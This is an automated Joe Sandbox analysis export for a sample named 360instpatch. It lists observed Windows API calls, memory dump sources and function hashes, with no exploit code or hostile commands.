                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                                                                              • Opcode ID: 7a521fa8bef36cf283348dcba20538d301a204da11a3957ed52103e895abbc94
                                                                                                                                                                                                              • Instruction ID: 19ffce6d812b0a755dab0260076d00bca1ecdb30e973297d547c4816169fecb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a521fa8bef36cf283348dcba20538d301a204da11a3957ed52103e895abbc94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE0ECB5914604AFDB08EBA0C856E2E77A5AF45311F2004D8F1026B2B2CB79AD41DA21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KillTimer.USER32(?,00002711), ref: 00B4663D
                                                                                                                                                                                                              • PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 00B4664F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: KillMessagePostTimer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3249405171-0
                                                                                                                                                                                                              • Opcode ID: 4f9ea4417dabc37a6e8023b1a07e96f615d937c2d169558600ade927dc59049b
                                                                                                                                                                                                              • Instruction ID: 3c141c2354616956148225f23c4db85d2924c981420fa770a687c6811e800aad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f9ea4417dabc37a6e8023b1a07e96f615d937c2d169558600ade927dc59049b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0A931150610FFE7200B24ED0EF827BA8EB28B01F10843BF219B50A0EBB0EC60CA44
APIs
• IsWindowVisible.USER32(?), ref: 00B4665F
• Shell_NotifyIconW.SHELL32(00000002), ref: 00B46672
Memory Dump Source
• Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
Similarity
• API ID: IconNotifyShell_VisibleWindow
• String ID:
• API String ID: 1820326197-0
APIs
• SetEvent.KERNEL32(00000000), ref: 6BF117FB
Memory Dump Source
• Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
Similarity
• API ID: Event
• String ID:
• API String ID: 4201588131-0
APIs
• _malloc.LIBCMT ref: 6BEE9C5C
  • Part of subcall function 6BEE789C: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 6BEE78B6
  • Part of subcall function 6BEE789C: GetLastError.KERNEL32 ref: 6BEE78C7
  • Part of subcall function 6BEE789C: GetLastError.KERNEL32 ref: 6BEE78CD
Memory Dump Source
• Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
• Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
Similarity
• API ID: ErrorLast$FilePointer_malloc
• String ID:
• API String ID: 1834257132-0
APIs
• __EH_prolog3.LIBCMT ref: 00B844EA
  • Part of subcall function 00B842DE: __EH_prolog3.LIBCMT ref: 00B842FD
  • Part of subcall function 00B842DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 00B84327
  • Part of subcall function 00B82158: __EH_prolog3.LIBCMT ref: 00B82177
  • Part of subcall function 00B82158: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 00B821BD
  • Part of subcall function 00B82158: _memset.LIBCMT ref: 00B821DF
  • Part of subcall function 00B82158: DeviceIoControl.KERNEL32(?,0004D030,?,00000028,?,00000028,?,00000000), ref: 00B82236
  • Part of subcall function 00B82158: _memset.LIBCMT ref: 00B8226C
  • Part of subcall function 00B83BFD: __EH_prolog3_catch.LIBCMT ref: 00B83C04
  • Part of subcall function 00B83BFD: CoCreateInstance.OLE32(00BDC868,00000000,00000001,00BDC798,?,00000038,00B84568,?,?,?,?,?,0000001C,00B7EAD1,?,?), ref: 00B83C22
  • Part of subcall function 00B83BFD: SysFreeString.OLEAUT32(?), ref: 00B83C71
  • Part of subcall function 00B83BFD: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B83C88
  • Part of subcall function 00B83BFD: SysFreeString.OLEAUT32(?), ref: 00B83D26
Memory Dump Source
• Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
Similarity
• API ID: H_prolog3$CreateFreeString_memset$BlanketControlDeviceDriveFileH_prolog3_catchInstanceProxyType
• String ID:
• API String ID: 3646017727-0
APIs
• SetWindowLongW.USER32(?,00000000,?), ref: 00B3EB65
Memory Dump Source
• Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF32243: _memset.LIBCMT ref: 6BF32280
                                                                                                                                                                                                                • Part of subcall function 6BF32243: _strcat.LIBCMT ref: 6BF3228A
                                                                                                                                                                                                                • Part of subcall function 6BF32243: __wcstoi64.LIBCMT ref: 6BF322AE
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF32617
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wcstoi64_malloc_memset_strcathtonl
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2862793191-0
                                                                                                                                                                                                              • Opcode ID: b39932a0cb563a551617da8486bb74bd5fe36d02693fffc44d2580fd909f4b91
                                                                                                                                                                                                              • Instruction ID: 954df38e72d02eac2c2c60690321ee1b9064780b33106d5d2eb1e191c6a5d3be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b39932a0cb563a551617da8486bb74bd5fe36d02693fffc44d2580fd909f4b91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6011A333115A32BFE7609FB8EC01F9A77949F09B54F204119EA08DB5B0DABA994087D5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD7AE11
                                                                                                                                                                                                                • Part of subcall function 6CDDDF34: _malloc.LIBCMT ref: 6CDDDF4E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2346879263-0
                                                                                                                                                                                                              • Opcode ID: 7858957e854a9da20a599736bcc8dbb3b575c2e48917fea486174bd3a47320c7
                                                                                                                                                                                                              • Instruction ID: 38bb6a0982a1337b8c1b7f1e3d4cbab7d57811ee460b64af69265e654e73add5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7858957e854a9da20a599736bcc8dbb3b575c2e48917fea486174bd3a47320c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F221B071F0B384DAEF18CBB895143AE7AF05F11309F21449DD549D7BA1CB758A088776
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: b2d13459f75d93a76cd220f6494b47156bf53593af11ca51bdf4b0d50d632825
                                                                                                                                                                                                              • Instruction ID: e12ffde7c7b8311f1abfd70351dae69a87da56e828371f9c6a8b676d2a5b6c90
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2d13459f75d93a76cd220f6494b47156bf53593af11ca51bdf4b0d50d632825
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F11A23250012EABEF15CF64CC41EEE7BB9BB15304F0041EAE509A7250DB3A9A54CFE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B5EB38
                                                                                                                                                                                                                • Part of subcall function 00B95546: _malloc.LIBCMT ref: 00B95560
                                                                                                                                                                                                                • Part of subcall function 00B5E1E2: __EH_prolog3.LIBCMT ref: 00B5E1E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3$_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1683881009-0
                                                                                                                                                                                                              • Opcode ID: 2e2b63148b32a772494c4e578a43280191fbc5ef54b8dfee7dddb7f00e6283b1
                                                                                                                                                                                                              • Instruction ID: 5bd357167d6a66bb431593d53dee8ed605d8b40565f90aece3140cc9a4ffb9a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2b63148b32a772494c4e578a43280191fbc5ef54b8dfee7dddb7f00e6283b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1218E30601208AFDF159FA8C585BADBBF1AF48302F1440D8FD66AB391CBB18E44DB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B1E080: GetCurrentProcessId.KERNEL32 ref: 00B1E084
                                                                                                                                                                                                                • Part of subcall function 00B1E080: CreateFileW.KERNEL32 ref: 00B1E0AA
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,64A97E63,?,00000000,?,?,00000000,00BCD2E0,000000FF,?,00B1B43F,?), ref: 00B1E465
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3040742104-0
                                                                                                                                                                                                              • Opcode ID: 62ac2c4fd45ba163acf7fb284256d5acf86ae0878e173cec8565097002caade5
                                                                                                                                                                                                              • Instruction ID: 96932e5484038cbbbbb248f52c0bfd20bd03976b8e33b9be766abbfe6dc33458
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ac2c4fd45ba163acf7fb284256d5acf86ae0878e173cec8565097002caade5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11C272A04608ABEB10CF55E801BEEB7E8FB05760F4445AAFC2593780DB75E940CAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B5EBE1
                                                                                                                                                                                                                • Part of subcall function 00B5DE99: __EH_prolog3.LIBCMT ref: 00B5DEA0
                                                                                                                                                                                                                • Part of subcall function 00B5EB31: __EH_prolog3.LIBCMT ref: 00B5EB38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 431132790-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B662D1
                                                                                                                                                                                                                • Part of subcall function 00B36986: _wcschr.LIBCMT ref: 00B369AB
                                                                                                                                                                                                                • Part of subcall function 00B65F4D: __EH_prolog3_GS.LIBCMT ref: 00B65F54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4028972141-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00B34BC2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 6BEFB074
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: gethostbyname
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 930432418-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF3074A: WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 6BF30772
                                                                                                                                                                                                              • closesocket.WS2_32 ref: 6BF2E411
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastclosesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1278161333-0
                                                                                                                                                                                                              • Opcode ID: 295f15e3ccd22783d49df1d34b87a76fa4025a77f3155a11e19b634ffb1377ed
                                                                                                                                                                                                              • Instruction ID: 448d8a9fda8beae0bc6a74514326de3cd122c02d26a866a8486b2db0bace97ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 295f15e3ccd22783d49df1d34b87a76fa4025a77f3155a11e19b634ffb1377ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9301923A100219ABCF05DFB0D895EDE3BB9EF45354F100469F80693220CB35E9A4CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CC,00000000,00000001), ref: 6BF2C7E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                                              • Opcode ID: c8ab1124e1554648788265017ea8c48bf8014bf9d5101ca3db4e73ffb1c849d0
                                                                                                                                                                                                              • Instruction ID: 55bc2913e5ee3476106a7eb35dfe0375db7a46136d7cc673efccac5ec20be7fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8ab1124e1554648788265017ea8c48bf8014bf9d5101ca3db4e73ffb1c849d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A101F27AA407029FDB08CF69C841D57BBE5EF88320B11C0AAE909CB371D734D800CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: socket.WS2_32(00000002,00000002,00000011), ref: 6BF321C3
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: _memset.LIBCMT ref: 6BF321DB
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htonl.WS2_32(00000000), ref: 6BF321F2
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htons.WS2_32(?), ref: 6BF321FA
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: htonl.WS2_32(0100007F), ref: 6BF32216
                                                                                                                                                                                                                • Part of subcall function 6BF321AC: bind.WS2_32(00000000,?,00000010), ref: 6BF32222
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 6BF32693
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl$_memsetbindclosesockethtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 95467627-0
                                                                                                                                                                                                              • Opcode ID: d4b70e1370926a96fde62358690c77967b84a15cada92baea3eda85b7d31622e
                                                                                                                                                                                                              • Instruction ID: 2fd5f05a7b245b7ba810d278ee4892fedb68b3cf12e2cc2dcbc3d91fe576b73e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4b70e1370926a96fde62358690c77967b84a15cada92baea3eda85b7d31622e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F028638DD7E42AF73196744C2660B7E94DF03668B080AEAD062964A1E54F95C843E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: 4f0838c7f421b8b6c9ea3dabdd0dd994fa26370aea747a0e41250003eaf4a35e
                                                                                                                                                                                                              • Instruction ID: d5ab799c120e7777d22b0b9fbbd0b038a18a4250a10d5a77f6be0250deed3031
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0838c7f421b8b6c9ea3dabdd0dd994fa26370aea747a0e41250003eaf4a35e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95016236A11119ABCB00DBA48801FFF77B9EF45714F10446AE901E7291DB789A1597E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2102423945-0
                                                                                                                                                                                                              • Opcode ID: b2bc0367f4c3d1cd88daf1a0f2d87a481b833e268c4979d291cd1ae62c8cf177
                                                                                                                                                                                                              • Instruction ID: 35f116f5dae4b74dc883aedec70b51ed8d125215ef0ecadcdd7c88f5e34a6bd5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2bc0367f4c3d1cd88daf1a0f2d87a481b833e268c4979d291cd1ae62c8cf177
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F0A436A0120AABCB10DFA4C902FEFB7B9EF05610F00041AE901E7250D778EA1487E5
